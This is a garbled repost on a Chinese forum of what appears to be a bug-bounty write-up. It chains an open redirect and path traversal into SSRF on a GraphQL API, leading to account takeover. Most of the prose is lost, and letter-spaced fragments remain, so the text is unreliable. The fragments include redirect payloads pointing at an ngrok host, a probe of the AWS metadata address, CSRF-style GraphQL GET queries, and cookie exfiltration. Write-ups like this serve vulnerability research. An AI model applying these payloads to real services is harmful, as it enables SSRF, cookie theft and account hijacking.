[16086] 2020-11-13_挖洞经验开放重定向漏洞导致的账户劫持

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2020-11-13_挖洞经验开放重定向漏洞导致的账户劫持   |   c l o u d s   F r e e B u f   2 0 2 0 - 1 1 - 1 3 h t t p s : / / t a r g e t . c o m W e b C S R F . . / h t t p s : / / t a r g e t . c o m G E T   / a p i / . . / a p i / . . h t t p s : / / t a r g e t . c o m / / / g o o g l e . c o m / / g o o g l e . c o m h t t p s : / / t a r g e t . c o m / W e b b u r p G r a p h Q L   A P I G r a p h Q L A P I G r a p h Q L   A P I   R E S T   A P I G r a p h Q L   A P I G e t A u t h o r i z e d A p p s a p p O A u t h i d i d s t r i n g i d A P I s s r f h t t p : / / l o c a l h o s t : 8 0 8 0 / a p i / 1 / : I D 6 1 5 6 0 1 i d A P I 6 1 5 6 0 1 . . / . . / . . / i d U R L P a t h   t r a v e r s a l   +   O p e n   r e d i r e c t   =   S S R F   使 R E S T G r a p h Q L G r a p h Q L R E S T   A P I R E S T s s r f G r a p h Q L { q u e r y : q u e r y   G e t U s e r ( $ i d :   I D ! ) { n   G e t U s e r ( i d :   $ i d ) n } } , v a r i a b l e s : { I D : 1 2 3 4 5 } }   h t t p s : / / t a r g e t . c o m / a p i / u s e r / 1 2 3 4 5 G E T H T T P   1 . 1   3 0 1 . . . . L o c a t i o n :   / / a p i / . . . . . .
O p e n   r e d i r e c t P a t h   t r a v e r s a l P a t h   t r a v e r s a l   +   O p e n   r e d i r e c t   =   S S R F n g r o k b u r p c o l l a b o r a t o r S S R F n g r o k / / / X X X X X X X X . n g r o k . i o / /   S S R F n g r o k A W S S S R F A W S   E C 2 p y t h o n H T T P   S e r v e r h t t p : / / 1 6 9 . 2 5 4 . 1 6 9 . 2 5 4 n g r o k h t t p s n g r o k J S O N G o t c h a ! S S R F n g r o k s s r f c o o k i e X S S c o o k i e X S S G e t A u t h o r i z e d Z t s p l X X X X X X X G e t A u t h o r i z e d Z t s p l X X X X X X X G e t A u t h o r i z e d m u t a t i o n Z t s p l X X X X X X X G r a p h Q L A p o l l o G E T G E T   / g r a p h q l ? q u e r y = q u e r y   a T e s t ( $ a r g 1 :   S t r i n g ! )   { t e s t ( w h o :   $ a r g 1 )   } & o p e r a t i o n N a m e = a T e s t & v a r i a b l e s = { a r g 1 : m e } G E T Z t S p X X X X X X X X X C S R F C S R F C o o k i e C o o k i e n g r o k c o o k i e h t t p s : / / t a r g e t . c o m / a p i / g r a p h q l / v 2 ? q u e r y = q u e r y   Z t S p X X X X X X X X X ( $ i d :   I D ! )   {     X X X X X X X X ( i d :   $ i d )   {         t i t l e         s t e p s         h e a d S e r v i c e   {             i d             n a m e             _ _ t y p e n a m e         }         t a i l S e r v i c e   {             i d             n a m e             _ _ t y p e n a m e         }         s e r v i c e s   {             i d             n a m e             _ _ t y p e n a m e         }         _ _ t y p e n a m e     } } & v a r i a b l e s = {
2 0 2 0 . 8 . 2 9   2 0 2 0 . 8 . 3 0   2 0 2 0 . 9 . 1 8   n i n e t y n 1 n e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则